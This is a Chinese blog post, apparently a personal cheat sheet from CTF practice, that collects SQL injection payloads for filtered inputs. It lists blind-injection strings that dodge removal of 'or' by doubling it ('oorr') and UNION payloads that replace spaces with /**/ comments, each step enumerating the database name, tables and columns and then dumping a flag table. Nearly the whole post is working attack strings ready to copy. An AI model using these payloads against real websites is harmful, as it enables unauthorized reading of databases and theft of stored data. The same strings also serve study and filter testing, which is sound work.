美文网首页
sql注入各种转义,替换,过滤的payload收集-自用

sql注入各种转义,替换,过滤的payload收集-自用

作者: 违规昵称不予展示 | 来源:发表于2019-08-06 13:20 被阅读0次

0x01 替换了or、不能使用,、盲注

数据库长度
"0'oorr((length(database()))=%s)oorr'0" % (x)
数据库名
"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
表名
"0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
列名
"0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
dump
"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)

过滤空格、括号、有回显| 简单的sql注入2

查看库
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
查看有哪些表,1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
查看有哪些列:1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1
dump
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

相关文章

  • sql注入各种转义,替换,过滤的payload收集-自用

    0x01 替换了or、不能使用,、盲注 数据库长度"0'oorr((length(database()))=%s)...

  • web

    sql注入 刚开始尝试用uion注入发现union被过滤了,用and查询的时候单引号也被转义了,于是想找别的方法注...

  • 2.sql注入

    sql注入的防御方法:1.对输入的sql语句进行过滤或者转义2.使用waf3.数据库预编译(在根源上杜绝)http...

  • 一道简单的注入思考

    参数过滤以及传递如下: 基本上注入常用的都过滤了,但是没有过滤(、)、'、",payload如下:username...

  • SQL注入之delete注入

    delete注入: 找到删除链接: payload 然后就可以仿照SQL注入之insert注入这篇文章的方式往下进...

  • SQL注入之http头注入

    http头注入: 刷新进行抓包: payload 然后就可以仿照SQL注入之insert注入这篇文章的方式往下进行注入。

  • 预防SQL注入

    预防SQL注入 1.控制输入变量的格式 增加对输入信息的判断,过滤掉一些带特殊字符的输入。 2.转义特殊字符

  • 测试百度网站sql漏洞

    通过搜索关键字,获取页面相应网站地址,并用简单的sql注入payload去检测是否存在注入漏洞

  • SQL注入之update注入

    update注入: 在修改用户名输入: payload 然后就可以仿照SQL注入之insert注入这篇文章的方式往...

  • 系统安全 sql注入、xss漏洞、csrf跨域请求漏洞

    一、SQL注入: 将未经过滤的用户输入拼接到 SQL 语句中 避免sql注入: 在 PHP 的项目里要避免 SQL...

网友评论

      本文标题:sql注入各种转义,替换,过滤的payload收集-自用

      本文链接:https://www.haomeiwen.com/subject/ijmidctx.html